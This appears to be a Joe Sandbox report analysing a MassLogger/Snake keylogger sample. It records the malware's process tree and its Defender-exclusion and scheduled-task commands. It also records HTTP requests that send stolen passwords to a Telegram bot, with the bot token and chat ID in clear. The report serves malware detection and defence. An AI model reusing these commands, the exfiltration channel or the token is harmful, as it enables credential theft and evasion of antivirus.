Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UOEAjWmusE.exe

Overview

General Information

Sample name:UOEAjWmusE.exe
renamed because original name is a hash value
Original sample name:24d731e94d2250181a75707739b145da491194c5a6bfd29fd93ab276bb106601.exe
Analysis ID:1631784
MD5:ef9af793956c447b2763842821d3fbad
SHA1:99f2309031063e0231a4d278b92d07f6ba87162a
SHA256:24d731e94d2250181a75707739b145da491194c5a6bfd29fd93ab276bb106601
Tags:exeuser-adrian__luca
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • UOEAjWmusE.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UOEAjWmusE.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • UOEAjWmusE.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • MpCmdRun.exe (PID: 2304 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • gJdonuKfIrqN.exe (PID: 3552 cmdline: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe MD5: EF9AF793956C447B2763842821D3FBAD)
    • schtasks.exe (PID: 1224 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gJdonuKfIrqN.exe (PID: 1616 cmdline: "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0", "Telegram Chatid": "7791468448"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xdfb7:$a1: get_encryptedPassword
          • 0xe2df:$a2: get_encryptedUsername
          • 0xdd52:$a3: get_timePasswordChanged
          • 0xde73:$a4: get_passwordField
          • 0xdfcd:$a5: set_encryptedPassword
          • 0xf929:$a7: get_logins
          • 0xf5da:$a8: GetOutlookPasswords
          • 0xf3cc:$a9: StartKeylogger
          • 0xf879:$a10: KeyLoggerEventArgs
          • 0xf429:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 41 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.UOEAjWmusE.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            7.2.UOEAjWmusE.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.UOEAjWmusE.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                7.2.UOEAjWmusE.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.UOEAjWmusE.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1b7:$a1: get_encryptedPassword
                  • 0xf4df:$a2: get_encryptedUsername
                  • 0xef52:$a3: get_timePasswordChanged
                  • 0xf073:$a4: get_passwordField
                  • 0xf1cd:$a5: set_encryptedPassword
                  • 0x10b29:$a7: get_logins
                  • 0x107da:$a8: GetOutlookPasswords
                  • 0x105cc:$a9: StartKeylogger
                  • 0x10a79:$a10: KeyLoggerEventArgs
                  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 61 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, ParentImage: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, ParentProcessId: 3552, ParentProcessName: gJdonuKfIrqN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", ProcessId: 1224, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", ProcessId: 2112, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", ProcessId: 2112, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T15:48:35.899643+010020577441Malware Command and Control Activity Detected192.168.2.1249693149.154.167.220443TCP
                  2025-03-07T15:48:40.403148+010020577441Malware Command and Control Activity Detected192.168.2.1249694149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T15:48:25.365310+010028032742Potentially Bad Traffic192.168.2.1249689193.122.130.080TCP
                  2025-03-07T15:48:29.990241+010028032742Potentially Bad Traffic192.168.2.1249691193.122.130.080TCP
                  2025-03-07T15:48:32.865246+010028032742Potentially Bad Traffic192.168.2.1249689193.122.130.080TCP
                  2025-03-07T15:48:37.693395+010028032742Potentially Bad Traffic192.168.2.1249691193.122.130.080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T15:48:35.252587+010018100081Potentially Bad Traffic192.168.2.1249693149.154.167.220443TCP
                  2025-03-07T15:48:39.712501+010018100081Potentially Bad Traffic192.168.2.1249694149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: UOEAjWmusE.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.zxgto
                  Found malware configuration
                  Source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0", "Telegram Chatid": "7791468448"}
                  Source: gJdonuKfIrqN.exe.1616.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendMessage"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeReversingLabs: Detection: 78%
                  Multi AV Scanner detection for submitted file
                  Source: UOEAjWmusE.exeVirustotal: Detection: 74%Perma Link
                  Source: UOEAjWmusE.exeReversingLabs: Detection: 78%
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: UOEAjWmusE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49690 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49692 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49694 version: TLS 1.2
                  Source: UOEAjWmusE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: gATZ.pdbSHA256% source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
                  Source: Binary string: gATZ.pdb source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 4x nop then jmp 01165782h7_2_01165358
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 4x nop then jmp 011651B9h7_2_01164F08
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 4x nop then jmp 01165782h7_2_011656AF
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 4x nop then jmp 01115782h12_2_01115363
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 4x nop then jmp 011151B9h12_2_01114F08
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 4x nop then jmp 01115782h12_2_011156AF

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49693 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49693 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49694 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49694 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5d5d38c24983Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5d5d3ba3d77dHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49689 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49691 -> 193.122.130.0:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49690 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49692 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5d5d38c24983Host: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgl
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.coml
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/l
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgl
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgl
